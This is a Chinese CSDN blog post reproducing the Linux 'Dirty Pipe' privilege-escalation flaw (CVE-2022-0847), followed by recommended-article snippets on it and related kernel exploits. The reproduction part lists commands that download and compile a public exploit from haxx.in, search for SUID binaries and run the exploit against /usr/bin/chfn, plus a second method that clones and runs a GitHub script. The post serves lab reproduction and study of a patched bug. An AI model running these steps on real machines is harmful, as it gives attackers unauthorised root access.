CVE-2022-0847 linux提权漏洞复现

最新推荐文章于 2024-05-27 11:45:39 发布
最新推荐文章于 2024-05-27 11:45:39 发布
阅读量3.7k 收藏 8
点赞数 8
文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41274349/article/details/123388350
版权

0x01 概述:

CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe

0x02 :影响范围:

Linux Kernel版本 >= 5.8
Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102

0x03:复现

查看系统内核版本

uname -a

新增普通用户

useradd -m pikaqiu #-m:自动建立用户的登入目录

useradd -s /bin/bash pikaqiu2 #-s:指定用户登入后所使用的shell。

复现方法一:

su - pikaqiu #切换成普通用户

wget https://haxx.in/files/dirtypipez.c

gcc dirtypipez.c -o exp

sudo find / -perm -u=s -type f 2>/dev/null

这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权

 ./exp /usr/bin/chfn   #以这个文件为例

 方法二:

sudo gitt clone https://github.com/imfiver/CVE-2022-0847

sudo bash Dirty-Pipe.sh

参考链接:

漏洞复现 | DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现

DirtyPipe Linux 内核提权漏洞(CVE-2022-0847)_Sunnet的博客-CSDN博客

特别感谢:蜉蝣哥哥

 

小狐濡尾j
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Linux DirtyPipe内核漏洞CVE-2022-0847)与分析
SHELLCODE_8BIT的博客
10-27 2089
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”
新版脏牛Linux内核漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel < 5.16.11 / 5.15.25 / 5.10.102中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。 修版本:Linux 5.16.11、5.15.25 和 5.10.102 中修
CVE-2022-0847Linux内核漏洞
qq_49091880的博客
04-12 4515
步骤有点简略,各位师傅见谅
最详细Linux总结(建议收藏)
HUANGXIN9898的博客
05-27 735
1.只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.2.命令执行者要对该程序文件拥有执行(x)限.3.命令执行者在执行该程序时获得该程序文件属主的身份.4.SUID限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效。
CVE-2022-0847 Linux内核漏洞分析
道阻且长,行则将至。
04-06 5304
文章目录前言漏洞1.1 文件覆写poc/exp1.2 覆写/etc/passwd漏洞分析2.1 Linux管道机制2.2 splice系统调用2.3 漏洞利用流程总结 前言 2022年2月23日,Linux 内核发布漏洞补丁,修了内核 5.8 及之后版本存在的任意文件覆盖的漏洞 (CVE-2022-0847),该漏洞可导致普通用户本地至 root 特,因为与之前出的 DirtyCow “脏牛”漏洞 (CVE-2016-5195) 原理类似,该漏洞被命名为 DirtyPipe。 在3月7日,漏洞
CVE-2022-0847 Linux脏管道漏洞分析
qq_42735101的博客
01-26 928
CVE-2022-0847漏洞被一名叫Max Kellermann的安全研究员于2022年3月7日公开披露,并将该漏洞命名为The Dirty Pipe Vulnerability(脏管道漏洞)。
DirtyPipe(CVE-2022-0847) 脏管漏洞分析
Zyecho的博客
07-20 4148
本实验详细记录了DirtyPipe(CVE-2022-0847) 脏管漏洞的分析和
详解CVE-2022-0847 DirtyPipe漏洞
wangluoanquan111的博客
12-29 1114
不需要调用特syscall就能完成对任意只读文件的修改(有点类似之前的脏牛,但底层原理其实不一样),且由于利用过程中不涉及内存损坏,因此不需要ROP等利用方法,也自然不需要知道内核基址等信息,故不需要对内核版本进行适配(因此可以被广泛利用,危害巨大)。本质上,这个漏洞是由内存未初始化造成的,且从2016年就存在了,但在当时并不能发生有趣的利用,直到2020年由于对pipe内部实进行了一些修改,才让这个“BUG”变成了能够利用的“漏洞”。
CVE-2021-3493:Linux kernel特漏洞
Appleteachers的博客
04-22 1169
CVE-2021-3493:Linux kernel特漏洞 0x01 简介 linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 0x02 漏洞概述 Linux内核中overlayfs文件系统中的Ubuntu特定问题,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特。 0x03 影响版本 Ubun
CVE-2021-1732 Win32kfull内核漏洞
m0_56642842的博客
07-05 395
0x00 简介 安恒威胁情报中心在2020年12月中旬发的蔓灵花(BITTER)组织的攻击组件的分析过程中发其利用了win32kfull模块的一个0day漏洞,该漏洞是在 win32kfull.sys 中的可以实内核漏洞,该漏洞利用Windows操作系统win32k内核模块一处用户态回调机会,破坏函数正常执行流程,造成窗口对象扩展数据的属性设置错误,最终导致内核空间的内存越界读写。 0x01 漏洞概述 该漏洞的根本原因是Windows窗口创建(CreateWindowEx)过程中,在 Windo
exploit (Linux 内核CVE-2024-1086漏洞脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,成功,输入id,可看到已经是root限 。
DirtyCow漏洞CVE-2016-5195)1
08-08
2. **漏洞步骤**: - 首先,你需要在靶机上创建一个新的用户,例如`test`,使用`useradd test`命令。 - 接下来,切换到`test`用户,使用`su test`命令。 - 然后,你需要获取 Dirty Cow 的漏洞利用程序。这...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2022-0847:脏管道漏洞分析及对容器的影响
include_voidmain的博客
06-29 888
CVE-2022-0847:脏管道漏洞分析及对容器的影响
DirtyPipe 利用(CVE-2022-0847)
内核工匠
10-21 3832
事件背景3月初,国外安全研究人员披露了一个新的Android/Linux内核的高危漏洞漏洞编号为CVE-2022-0847。由于类似大名鼎鼎的DirtyCOW(脏牛)漏洞,又被命名为DirtyPipe(脏管道)。漏洞从上游linux内核5.8版本的一个补丁引入,影响所有使用linux内核的操作系统,在最新的手机系统Android12+kernel5.10上也有巨大安全危害。经过我们内部研究发,...
Linux内核漏洞(CVE-2022-0847)
Hackerdoors
03-28 6048
## 0X01 漏洞描述 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe” ## 0X02 影响范围 受影响版本 8 <= Linu
Linux-dirty pipe内核漏洞-编号:CVE-2022-0847
08-31 1302
漏洞属于Linux漏洞, 攻击者可利用该漏洞使任何非特(本地)用户在易受攻击的主机上获得root限,非特进程可以将代码注入到根进程使得攻击者可获取服务器的所有限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛),很多人应该了解并且能利用该漏洞。...
CVE-2022-0847(Dirty Pipe)
热门推荐
江左盟的博客
03-14 1万+
简介 2022年03月07日,国外安全研究员Max Kellermann披露了一个Linux内核本地漏洞 CVE-2022-0847。攻击者通过利用此漏洞可进行任意可读文件重写,将普通限用户升到 root限。该漏洞原理类似于 CVE-2016-5195(Dirty Cow),因此作者将此漏洞命名为“Dirty Pipe”。 漏洞作者原文:https://dirtypipe.cm4all.com 影响范围 Linux内核版本大于等于5.8,或小于5.16.11,5.15.25,5.10.102
2.2CVE-2022-34918漏洞技术原理
06-10
由于CVE-2022-34918是一种nftables堆溢出漏洞,需要构造特定的nftables规则才能触发漏洞,因此漏洞需要具备一定的技术水平。 具体来说,CVE-2022-34918漏洞的步骤如下: 1. 搭建测试环境:需要在一台Linux系统上搭建nftables环境,以及安装一些必要的工具,如gcc、make、gdb等。 2. 构造恶意规则:需要构造一个特定的nftables规则,以触发CVE-2022-34918漏洞。具体来说,可以通过在规则中使用特定的操作符和参数,向nftables传递恶意数据,从而导致堆溢出。 3. 触发漏洞:使用nft命令加载并执行构造好的恶意规则,从而触发CVE-2022-34918漏洞。 4. 利用漏洞:如果漏洞成功触发,可以使用一些调试工具如gdb来进一步分析漏洞,并尝试利用该漏洞执行任意代码或者进行拒绝服务攻击。 需要注意的是,CVE-2022-34918漏洞需要具备一定的技术水平,同时需要谨慎操作,以免对测试环境和实际系统造成不必要的影响。建议仅在专业人士的指导下进行相关操作。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值